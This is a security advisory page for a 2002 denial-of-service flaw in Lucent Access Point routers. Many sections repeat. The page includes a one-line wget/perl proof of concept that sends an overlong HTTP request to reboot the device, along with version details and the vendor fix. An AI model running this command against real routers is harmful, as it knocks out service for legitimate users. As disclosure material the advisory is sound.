Lucent Access Point IP Services Router Long HTTP Request Denial Of Service Vulnerability
BID:5333
Info
Lucent Access Point IP Services Router Long HTTP Request Denial Of Service Vulnerability
| Bugtraq ID: | 5333 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2002 12:00AM |
| Updated: | Jul 27 2002 12:00AM |
| Credit: | Published by FX <[email protected]>and kim0 <[email protected]>. |
| Vulnerable: |
Lucent Access Point 600 Service Router Lucent Access Point 300 Service Router Lucent Access Point 1500 Service Router |
| Not Vulnerable: |
Lucent AP O/S 4.0 Lucent AP O/S 3.1 Lucent AP O/S 3.0 R3 Lucent AP O/S 2.5 .0R.4.3 |
Discussion
Lucent Access Point IP Services Router Long HTTP Request Denial Of Service Vulnerability
The Lucent Access Point series of routers support a web based administrative interface. An error has been reported in the embedded HTTP server.
It has been reported that sending a HTTP request consisting of approximately 4000 characters of data will cause the device to reboot. This may result in an interruption of service for legitimate users of the device.
The Lucent Access Point series of routers support a web based administrative interface. An error has been reported in the embedded HTTP server.
It has been reported that sending a HTTP request consisting of approximately 4000 characters of data will cause the device to reboot. This may result in an interruption of service for legitimate users of the device.
Exploit / POC
Lucent Access Point IP Services Router Long HTTP Request Denial Of Service Vulnerability
No exploit is required. The following shell command is provided as a demonstration:
wget `perl -e 'print "http://router_ip/"; print "A"x4000; print "/";`
No exploit is required. The following shell command is provided as a demonstration:
wget `perl -e 'print "http://router_ip/"; print "A"x4000; print "/";`
Solution / Fix
Lucent Access Point IP Services Router Long HTTP Request Denial Of Service Vulnerability
Solution:
The vendor has released versions of the access point operating system (AP O/S) to resolve this issue. Versions V2.5.0R.4.3, V3.0R3 and all versions of AP O/S V3.1 and V4.0 are reported to contain fixes. Users of affected packages should contact the vendor for further information on obtaining fixes.
Solution:
The vendor has released versions of the access point operating system (AP O/S) to resolve this issue. Versions V2.5.0R.4.3, V3.0R3 and all versions of AP O/S V3.1 and V4.0 are reported to contain fixes. Users of affected packages should contact the vendor for further information on obtaining fixes.
References
Lucent Access Point IP Services Router Long HTTP Request Denial Of Service Vulnerability
References:
References:
- Access Point® Product Family (Lucent)
- Phenoelit Advisory
(Phenoelit Group)